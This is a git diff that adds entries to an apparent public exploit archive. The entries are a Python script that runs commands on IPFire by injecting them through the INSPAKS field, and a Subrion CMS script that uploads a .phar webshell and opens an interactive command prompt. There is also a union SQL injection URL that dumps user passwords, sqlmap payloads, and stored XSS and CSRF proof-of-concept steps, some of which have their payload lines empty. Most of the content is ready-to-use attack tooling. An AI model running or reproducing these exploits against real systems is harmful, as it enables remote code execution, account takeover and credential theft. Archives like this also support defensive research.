diff --git a/exploits/cgi/webapps/49869.py b/exploits/cgi/webapps/49869.py
new file mode 100755
index 000000000..88330180d
--- /dev/null
+++ b/exploits/cgi/webapps/49869.py
@@ -0,0 +1,46 @@
+# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
+# Date: 15/05/2021
+# Exploit Author: Mücahit Saratar
+# Vendor Homepage: https://www.ipfire.org/
+# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
+# Version: 2.25 - core update 156
+# Tested on: parrot os 5.7.0-2parrot2-amd64
+
+#!/usr/bin/python3
+
+import requests as R
+import sys
+import base64
+
+try:
+ host = sys.argv[1]
+ assert host[:4] == "http" and host[-1] != "/"
+ url = host + "/cgi-bin/pakfire.cgi"
+ username = sys.argv[2]
+ password = sys.argv[3]
+ komut = sys.argv[4]
+except:
+ print(f"{sys.argv[0]} http://target.com:444 username password command")
+ exit(1)
+
+veri = {
+ "INSPAKS": f"7zip;{komut}",
+ "ACTION":"install",
+ "x": "10",
+ "y": "6" }
+token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
+header = {"Authorization": token,
+ "Connection": "close",
+ "Cache-Control": "max-age=0",
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+ "Origin": host,
+ "Sec-GPC": "1",
+ "Sec-Fetch-Site": "same-origin",
+ "Sec-Fetch-Mode": "navigate",
+ "Sec-Fetch-User": "?1",
+ "Sec-Fetch-Dest": "document",
+ "Referer": host}
+
+
+R.post(url, data=veri, headers=header, verify=False)
+print("Done.")
\ No newline at end of file
diff --git a/exploits/php/webapps/45161.py b/exploits/php/webapps/45161.py
index 1a345bb11..5bb055b37 100755
--- a/exploits/php/webapps/45161.py
+++ b/exploits/php/webapps/45161.py
@@ -1,4 +1,4 @@
-# Title: OpenEMR < 5.0.1 - Remote Code Execution
+# Title: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
diff --git a/exploits/php/webapps/49868.txt b/exploits/php/webapps/49868.txt
new file mode 100644
index 000000000..29899a8fb
--- /dev/null
+++ b/exploits/php/webapps/49868.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
+# Date: 14-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Category input field.
+
+Payload :
+
+Vulnerable URL :
+http://localhost/crm/admin/?page=services&view=category
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Category and click Add New button.
+3) Put Payload into the 'Category' input field.
+4) Click on Save.
+5) XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49870.txt b/exploits/php/webapps/49870.txt
new file mode 100644
index 000000000..1c174253d
--- /dev/null
+++ b/exploits/php/webapps/49870.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
+# Date: 14-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Linux parrot
+
+# --- Description --- #
+
+# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel
+
+# --- Proof of concept --- #
+
+1- Create account and login as member and go to: http://localhost/APR/edit_info.php
+2- Inject this payload into Firstname input :
+4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
+5- refresh the page and Xss popup will be triggered.
+
+6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
+7- Our Xss payload will be executed on Admin Browser
+
+** Attacker can use this vulnerability to take over Admin account **
\ No newline at end of file
diff --git a/exploits/php/webapps/49871.txt b/exploits/php/webapps/49871.txt
new file mode 100644
index 000000000..fe2420eeb
--- /dev/null
+++ b/exploits/php/webapps/49871.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
+# Date: 15-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.11 , Linux x64_x86
+
+
+# --- Proof of concept --- #
+
+# Vulnerable file : http://localhost/APR/admin/user.php
+
+# Exploit:
+
+
+
+ Add Admin
+
+
+ Absolutely Not Vulnerable Site :D
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49873.txt b/exploits/php/webapps/49873.txt
new file mode 100644
index 000000000..b4ac9b7c0
--- /dev/null
+++ b/exploits/php/webapps/49873.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
+# Date: 16-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Settings System Info field
+Payload :
+
+Vulnerable URL :
+http://localhost/chatbot/admin/?page=system_info
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Settings and Select System Info.
+3) Put Payload into the System name input field.
+4) Click on Save.
+5) XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49874.txt b/exploits/php/webapps/49874.txt
new file mode 100644
index 000000000..d58225f4f
--- /dev/null
+++ b/exploits/php/webapps/49874.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
+# Date: 2021-05-16
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+
+# This web application contains several SQL injection vulnerabilities in the following paths:
+ - http://localhost/editgroup.php?id=1
+ - http://localhost/edituser.php?id=1
+ - http://localhost/editcategory.php?id=10
+ - http://localhost/editproduct.php?id=1
+ - http://localhost/editsales.php?id=1
+
+# PoC (editgroup.php):
+
+- Vulnerable code:
+ $sql="SELECT * from user_groups where delete_status='0' and
+id='".$_GET['id']." '";
+
+- Payload:
+
+http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+
\ No newline at end of file
diff --git a/exploits/php/webapps/49875.txt b/exploits/php/webapps/49875.txt
new file mode 100644
index 000000000..712752466
--- /dev/null
+++ b/exploits/php/webapps/49875.txt
@@ -0,0 +1,59 @@
+# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
+# Date: 17/08/2021
+# Exploit Author: Abdulkadir AYDOGAN
+# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Version: 2.4.4
+
+Advanced Guestbook is a free open source guestbook script developed in PHP.
+Examples of features include email notifications, uploading pictures, html
+tags handling, multiple polls, comments and themes.
+
+#Description
+The following is PoC to use the XSS bug with authorized user.
+
+Firstly there are four part of a emotion object which is :
+
+- Emotion icon
+- Emotion file name
+- Emotion command which will be used to call this object (s_code)
+- Emotion description (s_emotion)
+
+Here is the exploitation steps for vulnerability:
+
+1. Login to your admin account.
+2. Go to "Smilies" tab to view and edit emotion icons
+3. Click "edit" text in the "Action" column to edit emotions
+4. Change emotion description to Javascript code
+5. Click the "Submit Settings"
+6. Click "Smilies" tab again to view all emotions and Javascript code will
+be executed
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: s_emotion
+# Attack Pattern:
+
+#PoC
+HTTP Request:
+
+POST /advancedguestbook/admin.php HTTP/1.1
+Host: HOST_ADDRESS
+Content-Length: 175
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://HOST_ADDRESS
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;
+_gat=1
+Connection: close
+
+s_code=:cool:&s_emotion=&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1
\ No newline at end of file
diff --git a/exploits/php/webapps/49876.py b/exploits/php/webapps/49876.py
new file mode 100755
index 000000000..c41f72df9
--- /dev/null
+++ b/exploits/php/webapps/49876.py
@@ -0,0 +1,120 @@
+# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
+# Date: 17/05/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://subrion.org/
+# Software Link: https://github.com/intelliants/subrion
+# Version: SubrionCMS 4.2.1
+# Tested on: Debian9, Debian 10 and Ubuntu 16.04
+# CVE: CVE-2018-19422
+# Exploit Requirements: BeautifulSoup library
+# https://github.com/intelliants/subrion/issues/801
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+from bs4 import BeautifulSoup
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
+parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
+parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
+
+options, args = parser.parse_args()
+
+if not options.url:
+ print('[+] Specify an url target')
+ print('[+] Example usage: exploit.py -u http://target-uri/panel')
+ print('[+] Example help usage: exploit.py -h')
+ exit()
+
+url_login = options.url
+url_upload = options.url + 'uploads/read.json'
+url_shell = options.url + 'uploads/'
+username = options.user
+password = options.passw
+
+session = requests.Session()
+
+def login():
+ global csrfToken
+ print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
+ print('[+] Trying to connect to: ' + url_login)
+ try:
+ get_token_request = session.get(url_login)
+ soup = BeautifulSoup(get_token_request.text, 'html.parser')
+ csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
+ print('[+] Success!')
+ time.sleep(1)
+
+ if csrfToken:
+ print(f"[+] Got CSRF token: {csrfToken}")
+ print("[+] Trying to log in...")
+
+ auth_url = url_login
+ auth_cookies = {"loader": "loaded"}
+ auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
+ auth_data = {"__st": csrfToken, "username": username, "password": password}
+ auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
+
+ if len(auth.text) <= 7000:
+ print('\n[x] Login failed... Check credentials')
+ exit()
+ else:
+ print('[+] Login Successful!\n')
+ else:
+ print('[x] Failed to got CSRF token')
+ exit()
+
+ except requests.exceptions.ConnectionError as err:
+ print('\n[x] Failed to Connect in: '+url_login+' ')
+ print('[x] This host seems to be Down')
+ exit()
+
+ return csrfToken
+
+def name_rnd():
+ global shell_name
+ print('[+] Generating random name for Webshell...')
+ shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+ time.sleep(1)
+ print('[+] Generated webshell name: '+shell_name+'\n')
+
+ return shell_name
+
+def shell_upload():
+ print('[+] Trying to Upload Webshell..')
+ try:
+ up_url = url_upload
+ up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
+ up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
+ up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
+ session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
+
+ except requests.exceptions.HTTPError as conn:
+ print('[x] Failed to Upload Webshell in: '+url_upload+' ')
+ exit()
+
+def code_exec():
+ try:
+ url_clean = url_shell.replace('/panel', '')
+ req = session.get(url_clean + shell_name + '.phar?cmd=id')
+
+ if req.status_code == 200:
+ print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
+ while True:
+ cmd = input('$ ')
+ x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
+ print(x.text)
+ else:
+ print('\n[x] Webshell not found... upload seems to have failed')
+ except:
+ print('\n[x] Failed to execute PHP code...')
+
+login()
+name_rnd()
+shell_upload()
+code_exec()
\ No newline at end of file
diff --git a/exploits/php/webapps/49877.txt b/exploits/php/webapps/49877.txt
new file mode 100644
index 000000000..b02c89409
--- /dev/null
+++ b/exploits/php/webapps/49877.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
+# Date: 2021-05-16
+# Exploit Author : bwnz
+# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
+# Version: 1.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
+# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
+# vulnerability to obtain remote code execution.
+
+
+-----SQL Injection-----
+Step 1.) Navigate to the login page and populate the email and password fields.
+Step 2.) With Burp Suite running, send and capture the request.
+Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
+Step 4.) Open a terminal and run the following command:
+ sqlmap -r
+
+Below are the SQLMap results
+
+Parameter: user_email (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
+----- END -----
+
+
+----- Authenticated RCE via Arbitrary File Upload -----
+# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
+
+Step 1.) After logging in, click the "Initialization" option and "Add System Info".
+Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
+Step 3.) By default, the file is uploaded to http:///Staff_registration/media/evil.php. Navigate to it for RCE.
+----- END ------
\ No newline at end of file
diff --git a/exploits/windows/local/49872.js b/exploits/windows/local/49872.js
new file mode 100644
index 000000000..f8d99558c
--- /dev/null
+++ b/exploits/windows/local/49872.js
@@ -0,0 +1,168 @@
+# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
+# Date: 15/05/2021
+# CVE : CVE-2013-3893
+# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
+# Exploit Author: SlidingWindow
+# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
+# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
+# Bypasses: DEP, ASLR using MSVCR71.DLL
+# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training
+
+
+
+
+
+